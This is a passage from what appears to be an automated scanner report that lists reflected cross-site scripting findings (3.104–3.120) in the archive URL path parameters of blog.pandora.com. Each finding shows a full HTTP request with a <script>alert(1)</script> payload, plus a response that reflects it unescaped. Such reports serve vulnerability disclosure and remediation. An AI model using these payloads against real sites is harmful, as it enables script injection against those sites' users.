Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:22 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2007a573a<script>alert(1)</script>1397d442dff/04/ was not found on this server.</p>
...[SNIP]...

3.104. http://blog.pandora.com/pandora/archives/2007/04/ [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2007/04/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 86757<script>alert(1)</script>a841a197765 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2007/0486757<script>alert(1)</script>a841a197765/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:26 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2007/0486757<script>alert(1)</script>a841a197765/ was not found on this server.</p>
...[SNIP]...

3.105. http://blog.pandora.com/pandora/archives/2007/05/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2007/05/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload d0cd0<script>alert(1)</script>6fc6995917b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandorad0cd0<script>alert(1)</script>6fc6995917b/archives/2007/05/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:08 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Content-Length: 349
Connection: close
Content-Type: text/html


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandorad0cd0<script>alert(1)</script>6fc6995917b/archives/2007/05/ was not found on this server.</p>
...[SNIP]...

3.106. http://blog.pandora.com/pandora/archives/2007/05/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2007/05/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 590d0<script>alert(1)</script>cfaacaaf3db was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives590d0<script>alert(1)</script>cfaacaaf3db/2007/05/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:11 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives590d0<script>alert(1)</script>cfaacaaf3db/2007/05/ was not found on this server.</p>
...[SNIP]...

3.107. http://blog.pandora.com/pandora/archives/2007/05/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2007/05/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 5b6bf<script>alert(1)</script>7c9340a2e6a was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/20075b6bf<script>alert(1)</script>7c9340a2e6a/05/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:15 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/20075b6bf<script>alert(1)</script>7c9340a2e6a/05/ was not found on this server.</p>
...[SNIP]...

3.108. http://blog.pandora.com/pandora/archives/2007/05/ [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2007/05/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload b5da7<script>alert(1)</script>d624e770f2a was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2007/05b5da7<script>alert(1)</script>d624e770f2a/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:21 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2007/05b5da7<script>alert(1)</script>d624e770f2a/ was not found on this server.</p>
...[SNIP]...

3.109. http://blog.pandora.com/pandora/archives/2007/06/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2007/06/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 8d9ba<script>alert(1)</script>060e4b9ef4e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora8d9ba<script>alert(1)</script>060e4b9ef4e/archives/2007/06/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:05 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora8d9ba<script>alert(1)</script>060e4b9ef4e/archives/2007/06/ was not found on this server.</p>
...[SNIP]...

3.110. http://blog.pandora.com/pandora/archives/2007/06/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2007/06/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload c0798<script>alert(1)</script>ad8c655c453 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archivesc0798<script>alert(1)</script>ad8c655c453/2007/06/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:08 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archivesc0798<script>alert(1)</script>ad8c655c453/2007/06/ was not found on this server.</p>
...[SNIP]...

3.111. http://blog.pandora.com/pandora/archives/2007/06/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2007/06/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload f490a<script>alert(1)</script>57eed6c6746 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2007f490a<script>alert(1)</script>57eed6c6746/06/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:10 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2007f490a<script>alert(1)</script>57eed6c6746/06/ was not found on this server.</p>
...[SNIP]...

3.112. http://blog.pandora.com/pandora/archives/2007/06/ [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2007/06/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 82d62<script>alert(1)</script>a51d01b1831 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2007/0682d62<script>alert(1)</script>a51d01b1831/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:13 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2007/0682d62<script>alert(1)</script>a51d01b1831/ was not found on this server.</p>
...[SNIP]...

3.113. http://blog.pandora.com/pandora/archives/2007/07/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2007/07/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 6e10b<script>alert(1)</script>bac3aa178c9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora6e10b<script>alert(1)</script>bac3aa178c9/archives/2007/07/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:11 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora6e10b<script>alert(1)</script>bac3aa178c9/archives/2007/07/ was not found on this server.</p>
...[SNIP]...

3.114. http://blog.pandora.com/pandora/archives/2007/07/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2007/07/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload ab862<script>alert(1)</script>9916758d92c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archivesab862<script>alert(1)</script>9916758d92c/2007/07/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:13 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archivesab862<script>alert(1)</script>9916758d92c/2007/07/ was not found on this server.</p>
...[SNIP]...

3.115. http://blog.pandora.com/pandora/archives/2007/07/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2007/07/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 6c196<script>alert(1)</script>20072b4f4e1 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/20076c196<script>alert(1)</script>20072b4f4e1/07/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:15 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/20076c196<script>alert(1)</script>20072b4f4e1/07/ was not found on this server.</p>
...[SNIP]...

3.116. http://blog.pandora.com/pandora/archives/2007/07/ [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2007/07/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 8c182<script>alert(1)</script>7e15c131859 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2007/078c182<script>alert(1)</script>7e15c131859/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:18 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/2007/078c182<script>alert(1)</script>7e15c131859/ was not found on this server.</p>
...[SNIP]...

3.117. http://blog.pandora.com/pandora/archives/2007/08/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2007/08/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload aeaa6<script>alert(1)</script>49ec8fcf801 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandoraaeaa6<script>alert(1)</script>49ec8fcf801/archives/2007/08/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:12 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandoraaeaa6<script>alert(1)</script>49ec8fcf801/archives/2007/08/ was not found on this server.</p>
...[SNIP]...

3.118. http://blog.pandora.com/pandora/archives/2007/08/ [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2007/08/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 4c8e6<script>alert(1)</script>556bf3f5c92 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives4c8e6<script>alert(1)</script>556bf3f5c92/2007/08/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:14 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives4c8e6<script>alert(1)</script>556bf3f5c92/2007/08/ was not found on this server.</p>
...[SNIP]...

3.119. http://blog.pandora.com/pandora/archives/2007/08/ [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2007/08/

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 63082<script>alert(1)</script>4fcc9a5c39d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/200763082<script>alert(1)</script>4fcc9a5c39d/08/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;

Response

HTTP/1.1 404 Page Not Found
Date: Sun, 09 Jan 2011 02:06:17 GMT
Server: Apache/2.2.9 (Debian)
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 349


<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /pandora/archives/200763082<script>alert(1)</script>4fcc9a5c39d/08/ was not found on this server.</p>
...[SNIP]...

3.120. http://blog.pandora.com/pandora/archives/2007/08/ [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://blog.pandora.com
Path:   /pandora/archives/2007/08/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload c796c<script>alert(1)</script>b994e2fabda was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pandora/archives/2007/08c796c<script>alert(1)</script>b994e2fabda/ HTTP/1.1
Host: blog.pandora.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
